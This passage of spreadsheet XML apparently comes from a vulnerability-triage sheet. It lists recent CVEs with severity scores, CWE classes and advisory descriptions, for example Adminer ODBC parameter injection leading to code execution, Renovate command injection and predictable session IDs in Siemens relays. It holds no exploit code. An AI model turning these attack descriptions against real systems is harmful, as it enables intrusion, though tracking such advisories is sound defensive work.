      <c r="L131" s="5" t="inlineStr"/>
      <c r="M131" s="5" t="inlineStr"/>
      <c r="N131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O131" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="P131" s="5" t="inlineStr"/>
      <c r="Q131" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R131" s="5" t="inlineStr">
        <is>
          <t>Renovate versions 37.158.0 before 37.199.0 contain a command injection vulnerability in the helmv3 manager's registryAliases handling that allows attackers with commit access to execute arbitrary commands. Attackers can manipulate registryAliases keys with unquoted shell metacharacters to inject commands executed during helm repo add operations, gaining full access to Renovate's execution environment.</t>
        </is>
      </c>
      <c r="S131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-58376</t>
        </is>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B132" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16279</t>
        </is>
      </c>
      <c r="D132" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E132" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F132" s="5" t="inlineStr">
        <is>
          <t>3DS.Information-Security@3ds.com</t>
        </is>
      </c>
      <c r="G132" s="5" t="inlineStr"/>
      <c r="H132" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I132" s="5" t="inlineStr"/>
      <c r="J132" s="5" t="inlineStr"/>
      <c r="K132" s="5" t="inlineStr"/>
      <c r="L132" s="5" t="inlineStr"/>
      <c r="M132" s="5" t="inlineStr"/>
      <c r="N132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O132" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P132" s="5" t="inlineStr"/>
      <c r="Q132" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="R132" s="5" t="inlineStr">
        <is>
          <t>An Improper Authorization vulnerability affecting 3DPassport in 3DSwymer from Release 3DEXPERIENCE R2023x through Release 3DEXPERIENCE R2026x could allow an attacker to gain access to some user accounts.</t>
        </is>
      </c>
      <c r="S132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16279</t>
        </is>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B133" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55068</t>
        </is>
      </c>
      <c r="D133" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E133" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F133" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G133" s="5" t="inlineStr"/>
      <c r="H133" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I133" s="5" t="inlineStr"/>
      <c r="J133" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K133" s="5" t="inlineStr"/>
      <c r="L133" s="5" t="inlineStr"/>
      <c r="M133" s="5" t="inlineStr"/>
      <c r="N133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O133" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P133" s="5" t="inlineStr"/>
      <c r="Q133" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R133"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S133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55068</t>
        </is>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B134" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56705</t>
        </is>
      </c>
      <c r="D134" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E134" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F134" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G134" s="5" t="inlineStr"/>
      <c r="H134" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I134" s="5" t="inlineStr"/>
      <c r="J134" s="5" t="inlineStr"/>
      <c r="K134" s="5" t="inlineStr"/>
      <c r="L134" s="5" t="inlineStr"/>
      <c r="M134" s="5" t="inlineStr"/>
      <c r="N134" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O134" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P134" s="5" t="inlineStr"/>
      <c r="Q134" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R134" s="5" t="inlineStr">
        <is>
          <t>Adminer before 5.4.3 fails to sanitize the server field before constructing a PDO DSN string, allowing unauthenticated attackers to inject ODBC parameters via semicolons. Attackers can inject TraceFile and TraceOn parameters to write PHP code to the web root, achieving remote code execution when the trace file is accessed.</t>
        </is>
      </c>
      <c r="S134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56705</t>
        </is>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B135" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62645</t>
        </is>
      </c>
      <c r="D135" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E135" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F135" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G135" s="5" t="inlineStr"/>
      <c r="H135" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I135" s="5" t="inlineStr"/>
      <c r="J135" s="5" t="inlineStr"/>
      <c r="K135" s="5" t="inlineStr"/>
      <c r="L135" s="5" t="inlineStr"/>
      <c r="M135" s="5" t="inlineStr"/>
      <c r="N135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O135" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P135" s="5" t="inlineStr"/>
      <c r="Q135" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R135" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). Information is exposed through the web interface that can be used to calculate the current and past session ID numbers. This could allow an attacker to bypass the authentication and gain unauthorized access to the device.</t>
        </is>
      </c>
      <c r="S135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62645</t>
        </is>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B136" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62647</t>
        </is>
      </c>
      <c r="D136" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E136" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F136" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G136" s="5" t="inlineStr"/>
      <c r="H136" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I136" s="5" t="inlineStr"/>
      <c r="J136" s="5" t="inlineStr"/>
      <c r="K136" s="5" t="inlineStr"/>
      <c r="L136" s="5" t="inlineStr"/>
      <c r="M136" s="5" t="inlineStr"/>
      <c r="N136" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O136" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P136" s="5" t="inlineStr"/>
      <c r="Q136" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R136" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). A random number generator is used to generate security-relevant values (such as session identifiers used for authentication purposes) that is not initialized with a True Random Number Generator (TRNG), resulting in a predictable sequence of generated values. This could allow an unauthenticated remote attacker to more easily predict the generated values and impersonate a legitimate authenticated user, potentially gaining unauthorized access to the device.</t>
        </is>
      </c>
      <c r="S136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62647</t>
        </is>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B137" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62928</t>
        </is>
      </c>
      <c r="D137" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E137" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F137" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G137" s="5" t="inlineStr"/>
      <c r="H137" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I137" s="5" t="inlineStr"/>
      <c r="J137" s="5" t="inlineStr"/>
      <c r="K137" s="5" t="inlineStr"/>
      <c r="L137" s="5" t="inlineStr"/>
      <c r="M137" s="5" t="inlineStr"/>
      <c r="N137" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O137" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P137" s="5" t="inlineStr"/>
      <c r="Q137" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R137" s="5" t="inlineStr">
        <is>
          <t>XING CPTrans-ME-X contains an OS Command Injection (CWE-78). Unauthenticated OS command may be injected.</t>
        </is>
      </c>
      <c r="S137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62928</t>
        </is>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B138" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66794</t>
        </is>
      </c>
      <c r="D138" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E138" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F138" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G138" s="5" t="inlineStr"/>
      <c r="H138" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I138" s="5" t="inlineStr"/>
      <c r="J138" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K138" s="5" t="inlineStr"/>
      <c r="L138" s="5" t="inlineStr"/>
      <c r="M138" s="5" t="inlineStr"/>
      <c r="N138" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O138" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="P138" s="5" t="inlineStr"/>
      <c r="Q138" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R138"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S138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66794</t>
        </is>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B139" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69356</t>
        </is>
      </c>
      <c r="D139" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E139" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F139" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G139" s="5" t="inlineStr"/>
      <c r="H139" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I139" s="5" t="inlineStr"/>
      <c r="J139" s="5" t="inlineStr"/>
      <c r="K139" s="5" t="inlineStr"/>
      <c r="L139" s="5" t="inlineStr"/>
      <c r="M139" s="5" t="inlineStr"/>
      <c r="N139" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O139" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P139" s="5" t="inlineStr"/>
      <c r="Q139" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R139" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Exchange Server allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="S139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69356</t>
        </is>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B140" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69657</t>
        </is>
      </c>
      <c r="D140" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E140" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F140" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G140" s="5" t="inlineStr"/>
      <c r="H140" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I140" s="5" t="inlineStr"/>
      <c r="J140" s="5" t="inlineStr"/>
      <c r="K140" s="5" t="inlineStr"/>
      <c r="L140" s="5" t="inlineStr"/>
      <c r="M140" s="5" t="inlineStr"/>
      <c r="N140" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O140" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P140" s="5" t="inlineStr"/>
      <c r="Q140" s="5" t="inlineStr">
        <is>
          <t>CWE-1393</t>
        </is>
      </c>
      <c r="R140" s="5" t="inlineStr">
        <is>
          <t>XING CPTrans-ME-X contains a Use of Default Password (CWE-1393). Anyone with the knowledge of the credential may log in to the affected device.</t>
        </is>
      </c>
      <c r="S140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69657</t>
        </is>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B141" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70403</t>
        </is>
      </c>
      <c r="D141" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E141" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F141" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G141" s="5" t="inlineStr"/>
      <c r="H141" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I141" s="5" t="inlineStr"/>
      <c r="J141" s="5" t="inlineStr"/>
      <c r="K141" s="5" t="inlineStr"/>
      <c r="L141" s="5" t="inlineStr"/>
      <c r="M141" s="5" t="inlineStr"/>
      <c r="N141" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O141" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P141" s="5" t="inlineStr"/>
      <c r="Q141" s="5" t="inlineStr">
        <is>
          <t>CWE-259</t>
        </is>
      </c>
      <c r="R141" s="5" t="inlineStr">
        <is>
          <t>XING CPTrans-ME-X contains a Use of Hard-coded Password (CWE-259). Anyone with the knowledge of the credential may log in to the affected device.</t>
        </is>
      </c>
      <c r="S141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70403</t>
        </is>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B142" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76200</t>
        </is>
      </c>
      <c r="D142" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E142" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F142" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G142" s="5" t="inlineStr"/>
      <c r="H142" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I142" s="5" t="inlineStr"/>
      <c r="J142" s="5" t="inlineStr"/>
      <c r="K142" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="L142" s="5" t="inlineStr"/>
      <c r="M142" s="5" t="inlineStr"/>
      <c r="N142" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O142" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P142" s="5" t="inlineStr"/>
      <c r="Q142" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R142"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S142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76200</t>
        </is>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B143" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76201</t>
        </is>
      </c>
      <c r="D143" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E143" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F143" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G143" s="5" t="inlineStr"/>
      <c r="H143" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I143" s="5" t="inlineStr"/>
      <c r="J143" s="5" t="inlineStr"/>
      <c r="K143" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="L143" s="5" t="inlineStr"/>
      <c r="M143" s="5" t="inlineStr"/>
      <c r="N143" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O143" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P143" s="5" t="inlineStr"/>
      <c r="Q143" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R143" s="5" t="inlineStr">
        <is>
          <t>Adobe Commerce is affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field, potentially gaining elevated access or control over the victim's account or session. Scope is changed.</t>
        </is>
      </c>
      <c r="S143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76201</t>
        </is>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B144" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77642</t>
        </is>
      </c>
      <c r="D144" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E144" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F144" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G144" s="5" t="inlineStr"/>
      <c r="H144" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I144" s="5" t="inlineStr"/>
      <c r="J144" s="5" t="inlineStr"/>
      <c r="K144" s="5" t="inlineStr">
        <is>
          <t>torproject:tor</t>
        </is>
      </c>
      <c r="L144" s="5" t="inlineStr"/>
      <c r="M144" s="5" t="inlineStr"/>
      <c r="N144" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O144" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P144" s="5" t="inlineStr"/>
      <c r="Q144" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R144" s="5" t="inlineStr">
        <is>
          <t>tor before 0.4.9.9 was prone to an out-of-bounds write when parsing a consensus or  detached signature with unexpected signature digest type. Impact  is minor for most Tor roles, but potentially major for directory   authorities. This is TROVE-2026-019.</t>
        </is>
      </c>
      <c r="S144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77642</t>
        </is>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B145" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78012</t>
        </is>
      </c>
      <c r="D145" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E145" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F145" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G145" s="5" t="inlineStr"/>
      <c r="H145" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I145" s="5" t="inlineStr"/>
      <c r="J145" s="5" t="inlineStr"/>
      <c r="K145" s="5" t="inlineStr"/>
      <c r="L145" s="5" t="inlineStr"/>
      <c r="M145" s="5" t="inlineStr"/>
      <c r="N145" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O145" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P145" s="5" t="inlineStr"/>
      <c r="Q145" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R145" s="5" t="inlineStr">
        <is>
          <t>An issue in the NetStaX EtherNet/IP Stack prior to v5.6.1 could allow a large Class 3 explicit-message request to exceed the application-side receive buffer without generating an error or warning. The result could be memory corruption, a device crash, or a potential remote attack vector without the originating device receiving a CIP error indicating that the request could not be processed.</t>
        </is>
      </c>
      <c r="S145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78012</t>
        </is>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B146" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78676</t>
        </is>
      </c>
      <c r="D146" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E146" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F146" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G146" s="5" t="inlineStr"/>
      <c r="H146" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I146" s="5" t="inlineStr"/>
      <c r="J146" s="5" t="inlineStr"/>
      <c r="K146" s="5" t="inlineStr"/>
      <c r="L146" s="5" t="inlineStr">
        <is>
          <t>pip:GitPython</t>
        </is>
      </c>
      <c r="M146" s="5" t="inlineStr">
        <is>
          <t>3.1.59</t>
        </is>
      </c>
      <c r="N146" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O146" s="5" t="inlineStr"/>
      <c r="P146" s="5" t="inlineStr"/>
      <c r="Q146" s="5" t="inlineStr">
        <is>
          <t>CWE-88, CWE-94</t>
        </is>
      </c>
      <c r="R146" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78676</t>
        </is>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B147" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78997</t>
        </is>
      </c>
      <c r="D147" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E147" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F147" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G147" s="5" t="inlineStr"/>
      <c r="H147" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I147" s="5" t="inlineStr"/>
      <c r="J147" s="5" t="inlineStr"/>
      <c r="K147" s="5" t="inlineStr"/>
      <c r="L147" s="5" t="inlineStr"/>
      <c r="M147" s="5" t="inlineStr"/>
      <c r="N147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O147" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P147" s="5" t="inlineStr"/>
      <c r="Q147" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R147" s="5" t="inlineStr">
        <is>
          <t>UC Browser for Android (package com.UCMobile.intl, version 13.7.8.1314) contains a Universal Cross-Site Scripting vulnerability that allows an attacker to execute arbitrary JavaScript in the context of any origin. An attacker hosts a specially crafted URL on a UC-owned domain (via a reflected XSS) that leverages the browser's internal JavaScript bridge to register a deferred callback, navigate the tab to a victim site, and then execute attacker-controlled code on that site when a login dialog is dismissed.</t>
        </is>
      </c>
      <c r="S147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78997</t>
        </is>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B148" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79657</t>
        </is>
      </c>
      <c r="D148" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E148" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F148" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G148" s="5" t="inlineStr"/>
      <c r="H148" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I148" s="5" t="inlineStr"/>
      <c r="J148" s="5" t="inlineStr"/>
      <c r="K148" s="5" t="inlineStr"/>
      <c r="L148" s="5" t="inlineStr">
        <is>
          <t>pip:nltk</t>
        </is>
      </c>
      <c r="M148" s="5" t="inlineStr">
        <is>
          <t>3.10.3</t>
        </is>
      </c>
      <c r="N148" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O148" s="5" t="inlineStr"/>
      <c r="P148" s="5" t="inlineStr"/>
      <c r="Q148" s="5" t="inlineStr">
        <is>
          <t>CWE-502, CWE-693</t>
        </is>
      </c>
      <c r="R148" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79657</t>
        </is>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B149" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82526</t>
        </is>
      </c>
      <c r="D149" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E149" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F149" s="5" t="inlineStr">
        <is>
